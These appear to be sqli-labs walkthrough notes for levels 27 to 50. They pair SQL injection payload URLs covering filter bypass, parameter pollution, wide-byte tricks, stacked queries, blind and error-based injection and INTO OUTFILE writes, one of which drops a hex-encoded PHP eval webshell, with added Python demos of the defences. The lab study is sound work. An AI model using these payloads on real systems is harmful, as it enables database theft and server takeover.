[sqli-labs] Study notes 2

less-27

  • Compared with the previous level, this one also filters union and select; the check is case-sensitive, so mixing upper and lower case is enough to bypass it.
# condition true
http://localhost/sqli-labs-7.2/Less-27/?id=1'=(left((seLect(group_concat(@@version))),1)='5')='1
# condition false
http://localhost/sqli-labs-7.2/Less-27/?id=1'=(left((seLect(group_concat(@@version))),1)='a')='1
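Why the mixed-case trick works, shown as an added example (not part of these notes or of the sqli-labs code): a keyword blacklist that strips words exactly as spelled lets any other capitalisation through, and even a case-normalised blacklist only blocks what its author listed. The table, rows, payload and function names below are constructed for the demo, with sqlite3 standing in for MySQL; the fix that actually closes the gap is parameter binding, which treats the input as data regardless of the keywords it contains.

```python
import sqlite3

# Constructed stand-in for the lab's users table (added example, not sqli-labs code).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", [(1, "Dumb"), (2, "Angelina")])
    return db

# A blacklist in the spirit of the level: keywords are removed exactly as spelled,
# so 'seLect' or 'UnIoN' pass through untouched.
BLOCKED = ("union", "select")

def naive_filter(value):
    for word in BLOCKED:
        value = value.replace(word, "")
    return value

# Normalising case before the comparison closes the mixed-case gap, but a
# blacklist still only blocks what its author remembered to list.
def normalized_filter_hits(value):
    lowered = value.lower()
    return any(word in lowered for word in BLOCKED)

def vulnerable_query(db, user_input):
    # The filtered value is still spliced into SQL, so a mixed-case UNION is parsed as SQL.
    sql = "SELECT username FROM users WHERE id = '%s'" % naive_filter(user_input)
    return sorted(row[0] for row in db.execute(sql))

def safe_query(db, user_input):
    # Parameter binding: the value is only ever data, whatever keywords it contains.
    rows = db.execute("SELECT username FROM users WHERE id = ?", (user_input,))
    return sorted(row[0] for row in rows)

if __name__ == "__main__":
    db = make_db()
    payload = "1' UnIoN SeLeCt 'injected"   # constructed; same mixed-case idea as the level's seLect
    print("after naive filter:", naive_filter(payload))
    print("concatenated query:", vulnerable_query(db, payload))
    print("bound parameter:   ", safe_query(db, payload))
```

The detection side follows from the same observation: if a WAF or input filter must be kept, compare against a lower-cased copy of the input, but treat the blacklist as a speed bump and the bound parameter as the control.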

less-27a

  • Same as level 27; only the closing delimiter changes.
  • Response when the condition is true (screenshot)
  • Response when the condition is false (screenshot)

less-28

  • I feel there is no big difference from level 27: only the closing delimiter changed, and it seems select is no longer filtered on its own.
http://localhost/sqli-labs-7.2/Less-28?id=1'=(left((seLect(group_concat(@@version))),1)='5')='1

less-28a

  • Even fewer filters than the previous level: only the combination union select is filtered, so replacing the space with parentheses is enough, or the level-28 payload can be used as-is.
http://localhost/sqli-labs-7.2/Less-28a?id=-1') union(select 1,2,group_concat(username) from users)  %23

less-29

  • Inject by exploiting the fact that Tomcat parses the first occurrence of a parameter while Apache takes the last one.
# dump the user
http://127.0.0.1:8001/sqli-labs/Less-29/index.jsp?id=1&id=-2'union select 1,user(),3--+
# dump database names
http://127.0.0.1:8001/sqli-labs/Less-29/index.jsp?id=1&id=-2'union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+
# dump table names
http://127.0.0.1:8001/sqli-labs/Less-29/index.jsp?id=1&id=-2'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security'),3--+
# dump column names
http://127.0.0.1:8001/sqli-labs/Less-29/index.jsp?id=1&id=-2'union select 1,(select group_concat(column_name) from information_schema.columns where table_name = 'users'),3--+
# dump data
http://127.0.0.1:8001/sqli-labs/Less-29/index.jsp?id=1&id=-2'union select 1,(select group_concat(username) from users),3--+

http://127.0.0.1:8001/sqli-labs/Less-29/index.jsp?id=1&id=-2'union select 1,(select group_concat(password) from users),3--+
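The parameter-pollution mechanism behind level 29, as an added example (not from these notes): two components parse the same query string, one keeps the first id and the other keeps the last, so a front-end check on the first value says nothing about what the back end will execute. The query string reuses the level's own payload; the function names are mine, and the check at the end shows the defensive rule, refuse any request in which a key repeats, then validate the single value that is left.

```python
from urllib.parse import parse_qs

# Constructed request in the level's shape: a clean first id, then a second id
# carrying the page's own payload (parse_qs turns the trailing '+' into a space).
QUERY = "id=1&id=-2'union select 1,user(),3--+"

def params(qs):
    # parse_qs keeps every occurrence of a key, in order, as a list.
    return parse_qs(qs, keep_blank_values=True)

def first_value(qs, key):
    """What a Tomcat-style front end sees: the first occurrence wins."""
    return params(qs).get(key, [None])[0]

def last_value(qs, key):
    """What the PHP/Apache back end sees: the last occurrence wins."""
    return params(qs).get(key, [None])[-1]

def is_numeric_id(value):
    return value is not None and value.isdigit()

def front_end_accepts(qs):
    # A check that only inspects the first value is satisfied by 'id=1'.
    return is_numeric_id(first_value(qs, "id"))

def duplicate_keys(qs):
    """Names that occur more than once: the precondition for this confusion."""
    return sorted(k for k, v in params(qs).items() if len(v) > 1)

def strict_accepts(qs):
    # Refuse repeated keys outright, then validate the one value that remains.
    if duplicate_keys(qs):
        return False
    return is_numeric_id(last_value(qs, "id"))

if __name__ == "__main__":
    print("front end sees id =", first_value(QUERY, "id"))
    print("back end sees id  =", last_value(QUERY, "id"))
    print("front-end check passes:", front_end_accepts(QUERY))
    print("strict check passes:   ", strict_accepts(QUERY))
```

In a real deployment the same rule is applied at the component that executes the query, not only at the proxy in front of it, because the two may never agree on which value is "the" parameter.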

less-30

  • Same as level 29; the closing delimiter becomes "
http://127.0.0.1:8001/sqli-labs/Less-30/index.jsp?id=1&id=-2"union select 1,(select group_concat(password) from users),3--+

less-31

  • Still the same as level 29; the closing delimiter becomes ")
http://127.0.0.1:8001/sqli-labs/Less-31/index.jsp?id=1&id=-2")union select 1,(select group_concat(password) from users),3--+

less-32

  • The leading ' is bypassed with a wide byte; the later ' characters are avoided by writing the string literals in hex.
# dump the username
http://127.0.0.1/sqli-labs/Less-32/?id=-1%df'union select 1,(user()),3--+
# dump database names
http://127.0.0.1/sqli-labs/Less-32/?id=-1%df'union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+
# dump table names
http://127.0.0.1/sqli-labs/Less-32/?id=-1%df'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 0x7365637572697479),3--+
# dump column names
http://127.0.0.1/sqli-labs/Less-32/?id=-1%df'union select 1,(select group_concat(column_name) from information_schema.columns where table_name = 0x7573657273),3--+
# dump data
http://127.0.0.1/sqli-labs/Less-32/?id=-1%df'union select 1,(select group_concat(username) from users),3--+

http://127.0.0.1/sqli-labs/Less-32/?id=-1%df'union select 1,(select group_concat(password) from users),3--+

less-33

  • Same as level 32...

less-34

  • Convert the UTF-8 input to UTF-16 or UTF-32; for example ' in UTF-16 becomes %ff%fe%27, and the universal password then bypasses the login directly.
>>> '\''.encode('utf-16')
"\xff\xfe'\x00"

less-35

  • Much like level 33, but there is no closing quote, so there is no need to bypass addslashes().
# dump database names
http://127.0.0.1/sqli-labs/Less-35?id=-1 union select 1,group_concat(schema_name) , 3 from information_schema.schemata %23
# dump table names
http://127.0.0.1/sqli-labs/Less-35?id=-1 union select 1,group_concat(table_name) , 3 from information_schema.tables where table_schema = 0x7365637572697479 %23
# dump column names
http://127.0.0.1/sqli-labs/Less-35?id=-1 union select 1,group_concat(column_name) , 3 from information_schema.columns where table_name = 0x7573657273 %23
# dump data
http://127.0.0.1/sqli-labs/Less-35?id=-1 union select 1,group_concat(username) , 3 from users %23

http://127.0.0.1/sqli-labs/Less-35?id=-1 union select 1,group_concat(password) , 3 from users %23

less-36

  • Because the MySQL connection charset is not set to GBK while the name field is GBK-encoded, the earlier %df%27 trick, or UTF-16/UTF-32 encoding, can be used to bypass mysql_real_escape_string().
# dump database names
http://127.0.0.1/sqli-labs/Less-36?id=-1%df' union select 1,group_concat(schema_name),3 from information_schema.schemata %23
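The charset mismatch that levels 32 and 36 rely on, as an added example (not from these notes or the lab): escaping is done byte by byte, but the database later decodes the bytes under a multibyte charset, so the 0x5C backslash that addslashes() inserted gets absorbed into a two-byte GBK character and the quote after it stands on its own. The functions are mine and model the %df case only; the last function shows the mitigation, decoding with the declared charset before escaping (or, better still, binding parameters so no escaping is needed).

```python
# Bytes that a PHP-style addslashes() prefixes with a backslash.
QUOTE_BYTES = b"'\"\\\x00"

def addslashes(data: bytes) -> bytes:
    """Byte-wise escaping like PHP's addslashes(): a backslash before ' " \\ and NUL."""
    out = bytearray()
    for b in data:
        if b in QUOTE_BYTES:
            out.append(0x5C)   # the backslash
        out.append(b)
    return bytes(out)

def decode_as_server(data: bytes, charset: str) -> str:
    """How the database reads those bytes under the connection charset."""
    return data.decode(charset, errors="replace")

def has_bare_quote(text: str) -> bool:
    """True if a single quote appears that is not preceded by a backslash character."""
    return any(ch == "'" and (i == 0 or text[i - 1] != "\\")
               for i, ch in enumerate(text))

def quote_survives(raw: bytes, charset: str) -> bool:
    """Escape at the byte level, then check whether the charset swallowed the backslash."""
    return has_bare_quote(decode_as_server(addslashes(raw), charset))

def charset_aware_escape(raw: bytes, charset: str) -> bytes:
    """Mitigation: decode with the declared charset first, escape characters, re-encode."""
    text = raw.decode(charset, errors="replace")
    escaped = "".join("\\" + ch if ch in "'\"\\\x00" else ch for ch in text)
    return escaped.encode(charset, errors="replace")

if __name__ == "__main__":
    raw = b"\xdf'"   # the page's %df%27, constructed as bytes
    for cs in ("utf-8", "gbk"):
        print(cs, "escaped:", addslashes(raw), "bare quote after decode:", quote_survives(raw, cs))
    fixed = charset_aware_escape(raw, "gbk")
    print("charset-aware:", fixed, "bare quote:", has_bare_quote(decode_as_server(fixed, "gbk")))
```

Under utf-8 the 0xDF byte is simply invalid and the backslash survives; under gbk the pair 0xDF 0x5C is one legal character, which is the whole trick. The operational check is therefore whether the charset the escaping function assumes is the same one the connection declares.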

less-37

  • Same idea as level 34: log in with the universal password.
uname=%ff%fe%27 or 1=1 %23 &passwd=dumb&submit=Submit

less-38

  • Stacked injection successfully inserts a row into the table.
http://127.0.0.1/sqli-labs/Less-38?id=1';insert into users(id,username,password) values('17','aaa','bbb'); %23

less-39

  • Compared with level 38, the closing quote is gone.
http://127.0.0.1/sqli-labs/Less-39?id=1 ;insert into users(id,username,password) values('17','aaa','bbb'); %23

less-40

  • Compared with level 39, the closing delimiter changes to ')
http://127.0.0.1/sqli-labs/Less-40?id=1') ;insert into users(id,username,password) values('17','aaa','bbb'); %23

less-41

  • The difference from level 39 is that errors are not displayed, so whether the injection succeeded can only be judged from the responses to and 1=1 / and 1=2.
http://127.0.0.1/sqli-labs/Less-41?id=1 ;insert into users(id,username,password) values('17','aaa','bbb'); %23

less-42

login_user=a &login_password=c';create table test(id INT,name varchar(100)) %23 ; &mysubmit=Login
  • Create a table (screenshot)
  • Drop a table (screenshot)

less-43

  • Compared with level 42, the closing delimiter changes.
login_user=a &login_password=c') ;create table test(id INT,name varchar(100)) %23 ; &mysubmit=Login

less-44

  • Same as level 42, except that it is blind.

less-45

  • Same type as level 44; only the closing delimiter changes.
login_user=a &login_password=c') ;create table test(id INT,name varchar(100)) %23 ; &mysubmit=Login

less-46

  • Injection after order by: error-based and time-based injection both work here.

# Because of the MySQL version, the error-based injection below only leaks the version, nothing more
http://127.0.0.1/sqli-labs/Less-46/?sort=1 and (select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x) %23

# error-based injection
http://127.0.0.1/sqli-labs/Less-46?sort=(select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2))) %23
# time-based injection
http://127.0.0.1/sqli-labs/Less-46?sort=1 and if(ascii(substr(database(),1,1)) = 116 , 0 , sleep(1) ) %23

http://127.0.0.1/sqli-labs/Less-46?sort= (select if(substring(current,1,1) = char(115) , benchmark(50000000,md5('1')),null) from (select database() as current ) as tb1 ) %23

# export to a file
http://127.0.0.1/sqli-labs/Less-46?sort=1 into outfile '/Users/hacker-mao/Documents/MAMP/2.php' %23

# write a file
http://127.0.0.1/sqli-labs/Less-46?sort=1 into outfile '/Users/hacker-mao/Documents/MAMP/3.php' lines terminated by 0x3c3f70687020406576616c28245f706f73745b22313233225d293f3e %23
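Why ORDER BY is a special case, as an added example (not from these notes or the lab): the sort key cannot be a bound parameter, so the level's pattern of splicing ?sort= straight into the statement lets the client supply any expression, and the resulting row order becomes a true/false oracle even without error messages or delays. The table, rows and the ALLOWED_SORT mapping are constructed, sqlite3 stands in for MySQL, and the function names are mine; the safe variant resolves the client value against an allowlist and interpolates only the trusted column name that comes out of it.

```python
import sqlite3

# Hypothetical mapping from client-facing sort keys to real column names.
ALLOWED_SORT = {"1": "id", "2": "username", "3": "password"}

def make_db():
    # Constructed stand-in for the lab's users table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "Dumb", "pw-a"), (2, "Angelina", "pw-b"), (3, "Zed", "pw-c")])
    return db

def order_by_unsafe(db, sort):
    # The level's pattern: whatever arrives in ?sort= lands after ORDER BY unchanged,
    # so any expression is accepted and the order of rows leaks its truth value.
    rows = db.execute("SELECT id, username, password FROM users ORDER BY %s" % sort)
    return [r[1] for r in rows]

def is_valid_sort(sort):
    return sort in ALLOWED_SORT

def order_by_safe(db, sort):
    # ORDER BY cannot take a bound parameter, so map the key through an allowlist
    # and interpolate only the column name that the table gives back.
    if not is_valid_sort(sort):
        raise ValueError("unknown sort key: %r" % sort)
    column = ALLOWED_SORT[sort]
    rows = db.execute("SELECT id, username, password FROM users ORDER BY %s" % column)
    return [r[1] for r in rows]

def order_by_safe_or_none(db, sort):
    try:
        return order_by_safe(db, sort)
    except ValueError:
        return None

if __name__ == "__main__":
    db = make_db()
    # Constructed oracle: row order depends on whether the subquery condition holds.
    probe = "CASE WHEN (SELECT count(*) FROM users) > 2 THEN username ELSE id END"
    print("unsafe, key 2:     ", order_by_unsafe(db, "2"))
    print("unsafe, expression:", order_by_unsafe(db, probe))
    print("safe, key 2:       ", order_by_safe(db, "2"))
    print("safe, expression:  ", order_by_safe_or_none(db, probe))
```

The same allowlist approach covers the direction (ASC/DESC) and any other identifier that must be interpolated; logging rejected sort keys also gives a clean detection signal, since legitimate clients never send anything outside the mapping.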

less-47

  • Compared with level 46, the closing delimiter changes.
# error-based injection
http://127.0.0.1/sqli-labs/Less-47/?sort=1'  and  (select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2))) %23

# time-based injection
http://127.0.0.1/sqli-labs/Less-47/?sort=1' and if(ascii(substr(database(),1,1)) = 116 , 0 , sleep(1) ) %23

# export to a file
http://127.0.0.1/sqli-labs/Less-47/?sort=1'  into outfile '/Users/hacker-mao/Documents/MAMP/2.php' %23

# write a file
http://127.0.0.1/sqli-labs/Less-47?sort=1' into outfile '/Users/hacker-mao/Documents/MAMP/3.php' lines terminated by 0x3c3f70687020406576616c28245f706f73745b22313233225d293f3e %23

less-48

  • Unlike level 46, no errors are shown, so this is blind injection; time-based injection is enough.
# time-based injection
http://127.0.0.1/sqli-labs/Less-48?sort=1 and if(ascii(substr(database(),1,1)) = 116 , 0 , sleep(1) ) %23

# or write a file with into outfile
http://127.0.0.1/sqli-labs/Less-48?sort=1 into outfile "/Users/hacker-mao/Documents/MAMP/4.php" %23

# write a file with lines terminated by
http://127.0.0.1/sqli-labs/Less-48?sort=1 into outfile '/Users/hacker-mao/Documents/MAMP/3.php' lines terminated by 0x3c3f70687020406576616c28245f706f73745b22313233225d293f3e %23

less-49

  • Unlike level 47, no errors are shown; this is blind as well, so use time-based injection.
# time-based injection
http://127.0.0.1/sqli-labs/Less-49?sort=1' and if(ascii(substr(database(),1,1)) = 116 , 0 , sleep(1) ) %23

# write a file with into outfile
http://127.0.0.1/sqli-labs/Less-49?sort=1'  into outfile '/Users/hacker-mao/Documents/MAMP/2.php' %23

# write a file with lines terminated by
http://127.0.0.1/sqli-labs/Less-49?sort=1' into outfile '/Users/hacker-mao/Documents/MAMP/3.php' lines terminated by 0x3c3f70687020706870696e666f28293b3f3e2020 %23


less-50

  • Looks much like level 46; the main difference is that this level uses mysqli_multi_query().
# time-based injection
http://127.0.0.1/sqli-labs/Less-50/?sort=1 and if(ascii(substr(database(),1,1)) = 116 , 0 , sleep(1) ) %23

http://127.0.0.1/sqli-labs/Less-50?sort= (select if(substring(current,1,1) = char(115) , benchmark(50000000,md5('1')),null) from (select database() as current ) as tb1 ) %23

# write a file with into outfile
http://127.0.0.1/sqli-labs/Less-50?sort=1 into outfile '/Users/hacker-mao/Documents/MAMP/2.php' %23

# write a file with lines terminated by
http://127.0.0.1/sqli-labs/Less-50?sort=1 into outfile '/Users/hacker-mao/Documents/MAMP/3.php' lines terminated by 0x3c3f70687020706870696e666f28293b3f3e2020 %23
  • order by stacked injection! The SQL here is executed with mysqli_multi_query(), whereas the earlier levels used mysqli_query(). The difference is that mysqli_multi_query() can execute several SQL statements while mysqli_query() executes only one, so here we can inject several statements at once, which is the stacked injection mentioned earlier.
http://127.0.0.1/sqli-labs/Less-50?sort=1 ; create table test like users;
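The mysqli_query() versus mysqli_multi_query() distinction that levels 38 to 45 and 50 turn on, as an added example (not from these notes or the lab): with a single-statement API the driver prepares one statement and refuses the text after the first ';', so a stacked payload fails before anything runs, whereas a multi-statement API executes the whole batch. sqlite3's execute() and executescript() play the two roles here; the table, rows, payload and function names are constructed. The third function shows that parameter binding removes the question altogether, because the input never becomes statement text.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the lab's users table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'Dumb', 'pw-a')")
    db.commit()
    return db

def table_names(db):
    rows = db.execute("SELECT name FROM sqlite_master WHERE type = 'table'")
    return sorted(r[0] for r in rows)

def lookup_single(db, user_id):
    # Single-statement API, the mysqli_query() situation: one statement is prepared
    # and anything after the first ';' is rejected, so nothing from the tail runs.
    sql = "SELECT username FROM users WHERE id = %s" % user_id
    try:
        return [r[0] for r in db.execute(sql)], None
    except (sqlite3.Warning, sqlite3.ProgrammingError) as exc:
        # older Pythons raise Warning here, newer ones ProgrammingError
        return [], str(exc)

def lookup_multi(db, user_id):
    # Multi-statement API, the mysqli_multi_query() situation: every statement in
    # the string is executed, so a ';' in the input turns a lookup into a batch.
    sql = "SELECT username FROM users WHERE id = %s" % user_id
    db.executescript(sql)
    return table_names(db)

def lookup_bound(db, user_id):
    # Parameter binding: the input is a value, never part of the statement text,
    # so the API's statement-count behaviour no longer matters.
    rows = db.execute("SELECT username FROM users WHERE id = ?", (user_id,))
    return [r[0] for r in rows]

if __name__ == "__main__":
    payload = "1; CREATE TABLE test (id INTEGER)"   # constructed stacked input
    db = make_db()
    print("single-statement:", lookup_single(db, payload), table_names(db))
    print("bound parameter: ", lookup_bound(db, payload), table_names(db))
    print("multi-statement: ", lookup_multi(db, payload))
```

The practical rule this illustrates: a multi-statement execution path should never be reachable from request data, and where one exists, an audit of every call site that concatenates input into it is the first thing to do.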
